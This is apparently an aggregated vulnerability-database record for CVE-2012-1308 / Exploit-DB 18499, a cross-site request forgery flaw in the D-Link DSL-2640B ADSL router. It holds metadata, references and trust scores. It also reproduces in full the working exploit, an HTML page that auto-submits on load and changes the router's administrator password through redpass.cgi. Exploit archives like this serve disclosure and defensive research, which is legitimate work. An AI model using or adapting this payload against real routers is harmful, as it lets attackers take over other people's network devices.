ID
VAR-E-201202-0295
CVE
cve_id: | CVE-2012-1308 | Trust: 1.9 |
EDB ID
18499
TITLE
D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery. CVE-80803 CVE-2012-1308. Webapps exploit for Hardware platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | d link | model: | dsl-2640b adsl router | scope: | - | version: | - | Trust: 1.0 |
vendor: | d link | model: | dsl-2640b | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : D-Link DSL-2640B (ADSL Router) CSRF Vulnerability
# Date : 19-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Vendor site : http://www.d-link.com
# Version : DSL-2640B
# Tested on : Firmware Version: EU_4.00; Hardware Version: B2
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Change Admin Account Password by Ivano Binetti]--------------------------------------------------+
Summary
1) Introduction
2) Vulnerability Description
3) Exploit
+---------------------------------------------------------------------------------------------------------------------------------+
1) Introduction
D-Link DSL-2640B is an ADSL router that (also) uses a web management interface.
2) Vulnerability Description
The D-Link DSL-2640B's web interface (listening on TCP/IP port 80) is prone to CSRF vulnerabilities which allow an attacker to change router
parameters and, among other things, to change the default administrator ("admin") password.
3) Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change ADMIN password</H2>
<form method="POST" name="form0" action="http://192.168.1.1:80/redpass.cgi?sysPassword=new_password&change=1">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
CREDITS
Ivano Binetti
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2012-1308 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 18499 | Trust: 1.6 |
db: | EDBNET | id: | 40864 | Trust: 0.6 |
db: | BID | id: | 52096 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-1308 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/18499/ | Trust: 0.6 |
url: | http://www.d-link.com | Trust: 0.3 |
url: | http://www.d-link.com/products/?pid=567 | Trust: 0.3 |
SOURCES
db: | BID | id: | 52096 |
db: | EXPLOIT-DB | id: | 18499 |
db: | EDBNET | id: | 40864 |
LAST UPDATE DATE
2022-07-27T09:56:52.840000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 52096 | date: | 2012-10-10T18:10:00 |
SOURCES RELEASE DATE
db: | BID | id: | 52096 | date: | 2012-02-21T00:00:00 |
db: | EXPLOIT-DB | id: | 18499 | date: | 2012-02-20T00:00:00 |
db: | EDBNET | id: | 40864 | date: | 2012-02-20T00:00:00 |